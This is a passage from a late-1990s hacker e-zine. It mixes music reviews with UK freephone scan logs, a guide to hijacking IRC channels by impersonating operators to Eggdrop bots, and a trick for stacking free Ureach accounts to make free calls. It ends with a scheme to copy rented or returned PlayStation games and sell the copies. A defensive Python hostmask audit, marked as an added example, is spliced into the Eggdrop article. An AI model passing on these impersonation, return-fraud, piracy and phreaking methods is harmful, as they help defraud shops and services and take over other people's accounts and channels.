Mmm, this is an interesting one this is - or maybe I'm just referring to the image on the cover, which features a pic of a woman with her arse out :) The mixing, as always with Smurf, is excellent, and the tape has some *brilliant* tunage on there. What I am surprised about is the fact the tape is quite slow - 160 Bpm. There's a few tracks on there I've heard on Happy Hardcore tapes, most notably Bass D & King Matthew - How Shall I, and Damien Kelly & Attic & Stylz - State Of The Nation. Overall this is an excellent tape, which proves Smurf is one to look out for.

Title: Andreas Viklund - Sweet Things
Reviewed by: CrossFire
Available from: http://www.traxinspace.com (Title Search)
Style: Dance-Pop

Oh yes! This starts off with some nice pianos, before dipping into a Vengaboys-esque intro (I don't mean that in a bad way), and then breaking down into the main melody. The whole song is really cutesy, but cutesy in a good way. Overall I think this track is excellent - nice one Mr Viklund!

Title: Xentar - Tears Of Happiness
Reviewed by: CrossFire
Available from: ftp://ftp.scene.org/pub/music/groups/te/te-tears.zip
Style: Happy Hardcore

Mmm, breakbeats :) This song starts off with some lovely breakbeats before dropping into the main loop, which isn't too dissimilar from another Happycore track whose name I can't remember. Anyway, this continues for a while, before breaking down a bit and a new instrumental loop starts. This track seems to be a reflection of the stuff being released in the happy hardcore scene at the moment, and although this track is better than most commercial efforts, it's nowt outstanding.

Title: DipA - The Light Of Love
Reviewed by: CrossFire
Available from: http://www.traxinspace.com/exe-bin/downloadfile.asp?SongID=16622
Style: Dance

Woah! Lovely lovely fantasy style intro :)) This track is a beauty - it is done in a kind of demo style (I mean the kind of music you would hear in a demo), sorta like something you would hear in a fantasy game, but a bit more up tempo. The song itself builds up really nicely, and then as usual starts another instrumental loop. A bit of a short 'un at 2 minutes 55 secs, but overall an excellent track done by a very nice guy :)

Title: DJ Creativity - Oldskool Vol. 5 (Mixtape)
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Oldskool

No tracklist available

This is a proper oldskool mix. Not just '94-'95 happy hardcore tracks, which some people seem to think is oldskool. Most of the tracks are from '92-'93, and there's some excellent tracks on there. The mixing complements the track selection excellently, everything is nice and smooth - just the way it should be. Excellent stuff.

Title: Modulo-2 - Smile and Nod
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Bit of everything

This is a 14 track album by a Canadian duo. There's a mix of hardcore, happy hardcore, drum 'n' bass and trancecore on here. The standard of production is excellent across the board.
I like some of the tracks, and I'm not so keen on others. This is the problem with covering such a range of genres, but I'm certain that there's a bit of something for everybody on this CD. The best track on the CD (IMHO) is definitely Peace Love Unity Revenge, which is an excellent jungle/drum 'n' bass stylee tune. Whatever you're into, I'm sure you'll love this CD.

Disclaimer: If you don't like what we say about your music then tough shit. We both review tracks and mixes fairly regardless of how much we (dis)like the person who made it. These are our opinions. You may not agree with them.

Walrus (ergophobe@dial.pipex.com)
CrossFire (crossfire@hackers-uk.freeserve.co.uk)

PRESENTS:

0800 Scans
~~~~~~~~~~
By: ergophobe

Before this month's UK hand scans (hopefully a regular feature from now on), a quick note on scanning. A lot of attention is paid to the 0800 freephone numbers, and consequently numbers change quite a lot, and as new exploits are discovered on 0800 lines they are corrected quickly. This happens less on 0500 numbers, as less attention is paid to them. But these are not the only freephone codes. A quick look in our BT phone directory tells us that there are lots of other freephone codes which are pretty much ignored. Here we have the full listing of all the freephone codes:

0080 014260 014593 014596 014599 018931 0321 0500 0760 0800 0808 09580

In addition to this there are plans to make all 08xx codes freephone. So get out there and get scanning.

Hand Scan of 0800 965 0xx
~~~~~~~~~~~~~~~~~~~~~~~~~

Scan notes: The 96x xxx range has almost as many country direct numbers as the infamous 89x xxx range, and indeed a lot of the numbers in this scan terminate in foreign countries. Most of them seem to be in the USA though. I would say that there are probably a few blueboxable numbers amongst this lot though.
Anything with "Weird Tones" next to it is probably worth checking out.

Key:
HU = Hangs Up
Fault = Sorry there is a fault. Please Try Again.
SYCCNBC = Sorry Your Call Can Not Be Completed
Fucked = Nothing happens at all.

01 HU
02 Fault
03 Fault
04 HU
05 Rings - No Answer
06 "Welcome to (can't make out name of service) international. Please enter the card number followed by #"
07 Rings - No Answer
08 Rings - No Answer
09 Fault
10 Fucked
11 Fault
12 HU
13 Lame Canadian business of some description. Don't attempt to connect to any of their offices, as the music you have to listen to while you're on hold is terrible
14 VMB/PBX
15 Human answer
16 Weird tones
17 Weird tones (sounds kinda like an ambulance)
18 Not in service
19 Fault
20 Rings - No Answer
21 HU
22 Rings - No Answer
23 VMB/PBX
24 HU
25 VMB
26 I think this is a French Telco recording saying something along the lines of there is a fault
27 HU
28 HU
29 HU
30 HU
31 Rings - No Answer
32 Human Answer
33 HU
34 HU
35 Korean Telco
36 HU
37 HU
38 HU
39 Rings - No Answer
40 VMB/PBX
41 Rings - No Answer
42 Human Answer
43 HU
44 HU
45 Enter PIN then #
46 Weird tones
47 HU
48 Enter PIN then #
49 HU
50 Modem/Fax
51 HU
52 HU
53 Modem/Fax
54 SYCCNBC
55 HU
56 HU
57 HU
58 SYCCNBC
59 VMB/PBX
60 Weird Tones
61 Weird Tones
62 SYCCNBC
63 Weird Tones
64 Fucked
65 SYCCNBC
66 SYCCNBC
67 SYCCNBC
68 SYCCNBC
69 HU
70 HU
71 HU
72 Weird Tones
73 Rings - No Answer
74 HU
75 Weird Tones
76 HU
77 Weird Tones
78 Foreign telco recording: "The number you are calling has not been installed"
79 Weird Tones
80 "The number has been disconnected"
81 HU
82 Enter PIN then #
83 Alamo rent a car
84 Weird Tones
85 Please enter PIN then #
86 HU
87 VMB
88 HU
89 Weird Tones
90 Rings - No Answer
91 Answerphone
92 HU
93 HU
94 HU
95 HU
96 Weird Tones
97 Rings - No Answer
98 SYCCNBC
99 HU
00 Employee attitude survey

Hand Scan of the first half of 0800 373 8xx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Scan notes: No C5 lines or anything in this scan.
In fact there's not much of interest at all except for a few carriers.

Key:
HU = Hangs Up
HA = Human Answer
NA = No Answer (Lazy Bastards who can't even be bothered to answer their fucking phone)

01 Carrier
02 HU
03 HU
04 NA
05 HU
06 HU
07 HU
08 HU
09 HU
10 NA
11 NA
12 HU
13 HU
14 HU
15 HU
16 HU
17 HU
18 HU
19 Answerphone
20 Answerphone
21 Answerphone
22 HU
23 HU
24 HA
25 This number seems to be permanently busy
26 HA
27 HA
28 Fax
29 NA
30 NA
31 HU
32 HU
33 HU
34 Answerphone
35 HA
36 HU
37 Some kind of customer support line for Hoover
38 "Sorry. The number you are calling has been changed"
39 HU
40 NA
41 This number seems to be permanently busy
42 HU
43 Carrier
44 HU
45 HU
46 HU
47 HU
48 HU
49 Answerphone
50 NA

ergophobe

Eggdrop Hacking
By The Mob Boss

Eggdrop is the famous Unix-based bot created some time ago to put an end to channel takeovers in, believe it or not, #Gay. Its main purpose is to run and maintain a channel, protecting it from takeovers and making sure OP status remains in the hands of its owner and those designated to have OP status. It's quite fun, but time consuming to set up. However it has been a valuable tool in maintaining many channels. Even those who are registered with X or W on Undernet keep Eggdrop bots running in their channels. The point of this article is not to talk about setting Eggdrop bots up (since I am making the assumption you already know how) but rather to discuss possible vulnerabilities with these bots. This is not only Eggdrop but IRC channel security. Since it seems channels are always getting taken I thought this might be a good thing to write about.

This is basically how your usual Eggdrop works once it is set up on the channel of its owner's choosing. Let's say Joe goes into his channel, #foobar, and wants to get Op'd by his bot. Joe has to message his bot for Op status. Let's say his bot's name is Retard. All he has to do is /msg Retard op his-password or he can DCC chat the bot and .op Joe.
When he logs in via DCC it's called the partyline. Now, besides the password, the ident is what the bot is looking at. That is how it realizes that it's Joe. The ident that you see on /whois or when someone enters the channel is what the bot recognizes. If you are not recognized by the bot, then it will just ignore you, meaning /msg and DCC chatting will mean nothing even if you knew the password. Knowing those basics it is easy to see why channels can be considered insecure.

Now, on to how we might exploit a bot for Op status. The first step is surveillance of the channel. The point of the surveillance is to pick up on how it is run and what formalities there are to get Op'd. Also, how many bots are in the channel, the kind of bot (most likely Eggdrop), and of course the nicks and idents of the operators. Please keep in mind that the nick does not matter to the bot; it is only the ident (something@127.0.0.1 for example) that it looks at. Now when in the channel it is important to be as covert as possible and to keep good notes, especially of the idents of operators. If you are in fear of being detected it would be wise to use a proxy or wingate when connecting, but something obvious with the abbreviation "proxy" would probably not be too wise.

Once you have established who the players are it's time to see who you could most easily impersonate. For instance, if you see that five different people get Op'd by the bot then you should take a look at what their ISPs are. The best thing to look for is someone who is using a national ISP, for example, AOL or Prodigy. The main thing is something that you can get your hands on one way or another (I will not be discussing ripping off ISPs, sorry). Now if your subject happens to be using AOL, hold your breath, and sign on. Then minimize that shitty little browser and head for IRC.

Before you log on IRC, though, you should change all the details to those of the subject: the ident, name, email address, even the nick if you feel so inclined. Now, attempt to DCC chat the bot. If you do get that little Eggdrop greeting screen prompting you for your password then you're in luck. Now something weird that happened to me once was, when I /msg'ed the bot it seemed to think that I was a new user and it wanted me to set a password, which I did, and then voila, I logged in and had OP status. It was clear that whoever it was assigned for had not logged into it yet, or there was a misconfiguration. The point is that if you play around with it long enough you're bound to figure a way in because the login process itself is not all that safe. Another possibility is that your target set up their bot to auto-op people; if so then they are pretty dumb since all you have to do is emulate that person's info and you'll have Op status.

Now if there is no misconfiguration in the setup of the bot itself you can always try to brute force the bot's password, which of course is not going to be all that easy. One way you might get a password that the target uses is by getting him to sign up with you for something that requires a password. Chances are he uses the same password for many things. If you want to be a script kiddie well you can always go about using a script to do it, it's up to you.

Please use this information in an honorable way. Taking channels is not something that you should make a habit of and I can tell you from experience people get pissed when you do. Make sure the benefits outweigh the time and effort it will take you. In a lot of instances it's completely pointless to attempt to take someone's channel. There is a shot that certain IRCops will get pissed with you as well and attempt to ban you. Just think about what you're doing beforehand. To those who found this text too basic or lame, why did you bother reading this far?
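The weakness the Mob Boss describes comes down to the bot trusting whatever nick!ident@host the IRC server shows it, so an op entry whose hostmask covers a whole national ISP is satisfied by any customer of that ISP. As an added example, not part of this article and not Eggdrop's own code, here is a small audit a channel owner can run over the bot's user records to find op hostmasks that a stranger from the same ISP would match. The records, the record layout (handle, flags, hostmasks) and the wildcard rules ('*' any run of characters, '?' one character) are assumptions modelled loosely on Eggdrop-style user files.

```python
import re

# Constructed sample user records: (handle, flags, hostmasks).
# Layout and flag letters ('o' = op) are assumptions in the style of an
# Eggdrop userfile, not a real one.
USER_RECORDS = [
    ("Joe",   "nmo", ["*!*joe@*.dialup.example-isp.net"]),
    ("Sue",   "o",   ["*!*@*.aol.com"]),                    # any AOL customer matches
    ("Bert",  "o",   ["*!*@*", "*!bert@pc7.example.org"]),  # first mask matches everyone
    ("Guest", "",    ["*!*@*.aol.com"]),                    # no op flag, so not audited
]


def mask_to_regex(mask):
    """Compile a nick!ident@host wildcard mask ('*' any run, '?' one char) to a regex."""
    out = []
    for ch in mask:
        if ch == "*":
            out.append(".*")
        elif ch == "?":
            out.append(".")
        else:
            out.append(re.escape(ch))
    return re.compile("^" + "".join(out) + "$", re.IGNORECASE)


def mask_matches(mask, hostmask):
    """True if the wildcard mask covers the whole nick!ident@host string."""
    return mask_to_regex(mask).match(hostmask) is not None


def split_mask(mask):
    """Split nick!ident@host into its three parts."""
    nick, _, rest = mask.partition("!")
    ident, _, host = rest.partition("@")
    return nick, ident, host


def broadness(mask):
    """Heuristic reasons a mask is easy for a stranger to satisfy (empty list = looks specific)."""
    _nick, ident, host = split_mask(mask)
    reasons = []
    if host == "*":
        reasons.append("matches any host")
    elif host.startswith("*.") and len(host[2:].split(".")) <= 2:
        # e.g. *.aol.com: every customer of that ISP shares the suffix
        reasons.append("covers every host under " + host[2:])
    if ident == "*" and reasons:
        reasons.append("ident not pinned either")
    return reasons


def who_matches(records, hostmask):
    """Handles whose masks accept the given nick!ident@host, i.e. who the bot would take it for."""
    return [handle for handle, _flags, masks in records
            if any(mask_matches(m, hostmask) for m in masks)]


def audit_op_masks(records):
    """Map each op handle to its over-broad masks with reasons; specific masks are left out."""
    findings = {}
    for handle, flags, masks in records:
        if "o" not in flags:
            continue
        bad = [(m, broadness(m)) for m in masks if broadness(m)]
        if bad:
            findings[handle] = bad
    return findings


if __name__ == "__main__":
    for handle, bad in audit_op_masks(USER_RECORDS).items():
        for mask, reasons in bad:
            print(f"{handle}: {mask}: {'; '.join(reasons)}")
    # A constructed hostmask of some unrelated AOL customer: whose op entry does it satisfy?
    print(who_matches(USER_RECORDS, "Stranger!~xyz@ac9f1234.ipt.aol.com"))
```

Run on the constructed records, the audit flags Sue's mask (any AOL host, no ident) and Bert's catch-all mask, while Joe's mask, which pins the ident and a deeper host suffix, passes. The second check shows the other side of the same fact: an arbitrary AOL hostmask is accepted under three handles, two of them ops, which is exactly the situation the article relies on.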
-The Mob Boss; http://mobboss.dragx.cx
Voice mail and fax: 1-877-203-3043
Edited By Bigh

* BBS LIST *
The Sacrifial Lamb - english.gh0st.net
Ripco BBS - ripco2.ripco.com
The NorthLand Underground BBS - nub.dhs.org
L0pht BBS - bbs.l0pht.com

This has been a publication written by THE MOB BOSS; He is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the user's discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only. THE MOB BOSS © 1999 all rights reserved

Free Calls With Ureach
By The Mob Boss

Hello boys and girls, I'm here again with another text for the masses. Today's topic is the wonderful service provided by Ureach.com, the free voice mail, fax, and e-mail service which has been becoming increasingly popular among people in the h/p field. It's a good thing to see that the powers that be have finally caught on to the fact that people won't steal voice mail if you give it to them free. I have been using the service for months now and really love it. Lately though, now that their beta testing is through, they have added some services. One of these new services caught my eye: call forwarding. If you enable the service, which they call ureachme, it will give callers the option, at times you designate, to be automatically forwarded to a number you choose. Now I don't know if they were smoking crack when they decided to initialize this service but they scream, "RAPE ME". This service can be used to call anywhere in the United States on Ureach's nickel if you play your cards right. All you have to do is set up your box to forward to any number you like, right?
Well, this system has some limitations. First of all, this quickly eats your 60 minute per month time allotment, charging you 1.5 minutes for every minute a phone call forwarded from your box is in progress. Another problem is that the person on the receiving end has to decide whether or not to take the call by pressing the number one to accept. This means there will be no forwarding to your favorite PBX or conference number across the country. Now purely in theory if you have someone on the three way you might be able to push yourself through, but I have been unable to test that method. Now if the person knows beforehand that you want to give him a ring then of course he will accept. So this can be good for talking to your pals from IRC and at the same time neither one of you has to supply your phone number to the other.

The only problem left is that lousy time limit. Well, you can get around that. Now, considering that you can get a 40 minute phone call per fully charged ureach box, just set up as many boxes as you need. After all, they are free and in the words of Homer J. Simpson, "In the great buffet of life you have to pile up your plate and stuff some rolls in your pockets." Now use this sparingly as this will undoubtedly cease to exist eventually, and if you are a real bitch to the poor folks at ureach they might sue you or something. Always remember the accounts you set up, as next month you can use them again. Well, there is a new fresh way to communicate with your hack and phreak buddies as much as you like free of charge.
-The Mob Boss; http://mobboss.dragx.cx
Voice mail and fax: 1-877-203-3043
Edited by: SHADOWMOB

PRESENTS:

Making Money from your Playstation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By CrossFire

Introduction
------------

Has daddy just bought you a brand spanking new Playstation? Have you got a CD writer? If the answer to both of those questions is yes, read on; if not, go away and read Pokemon Magazine.

What You Need
-------------

Playstation (preferably chipped)
CD Writer
Account at a local video rental store
Friends
Brain (optional)

Installing a Mod Chip
---------------------

The first thing you're going to need for this scheme is a chipped Playstation. Basically what the chip does is tell the Playstation that the game is official and not to bother checking it out, so you can play copied and imported games.
To find a list of suppliers try buying a mag such as Playstation Power; they have companies that will supply chips for as low a price as £5, and most will come with instructions (well, I hope they do, cos I ain't going to tell you here :))

Obtaining The Games
-------------------

There are a few ways to obtain games, but my favourite is by renting them. Go down to your local video shop and join it; this usually is free or costs around £1. Try searching around for the cheapest video stores, and don't even think about using the big players (Blockbuster etc), cos it costs around £4 to rent a normal Playstation game from them. Once you've got the game, use your favourite software to copy it (I use Adaptec CD Copier Deluxe, which came with my CD writer). Pop the game in your newly chipped Playstation and see if it works.

Another method of obtaining games was suggested in A-S 13 (in the warez corner). The basic idea was that you go down to a games store such as Electronics Boutique, buy a game from them, take it home, copy it, then return it to the store (you must have the receipt to do this!), say you weren't satisfied with it (make up an excuse), and they will either give you a refund or credit, preferably credit because you can do it again. Repeat this until you have quite a lot of games, then move on to the next step.

Now that you have some games...
-------------------------------

Load up a copy of Paint Shop Pro (or whatever paint program you use), and make a nice cover for the CD, print it off and stick it on the CD case. Write up a catalogue of the games you have, print off a few copies and give them to friends. Now sit back and watch as the cash rolls in.

Extras
~~~~~~

A nice little service you should offer your customers is selling mod chips. In the aforementioned Playstation Power magazine there are a few services that will sell you mod chips really cheaply; the lowest I have seen is £5. The normal going rate for chips is £10.
I think you can guess what happens next :)

The bit at the end
~~~~~~~~~~~~~~~~~~

A short article, but I hope you found it useful. Email all flames etc to crossfire@hackers-uk.freeserve.co.uk

:..::.File 14 Of 14.::..:
:..Disclaimer & The End.:
:.::.:.By Up Staff.:.::.:

<*> Use this information at your own risk. Staff or contributors to Underground Periodical, nor the persons providing or hosting Underground Periodical, will NOT assume ANY responsibility for the use, misuse, or abuse, of any information provided herein. The previous information is provided for educational purposes ONLY. This information is NOT to be used for any illegal purposes whatsoever.

<*> By reading Underground Periodical you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Underground Periodical staff, contributors, or anyone that provided this issue or any other issue of Underground Periodical whether it were official or without notification. I understand that this information is for educational purposes only.

Thanks for reading.

:..::..End Of File..::..: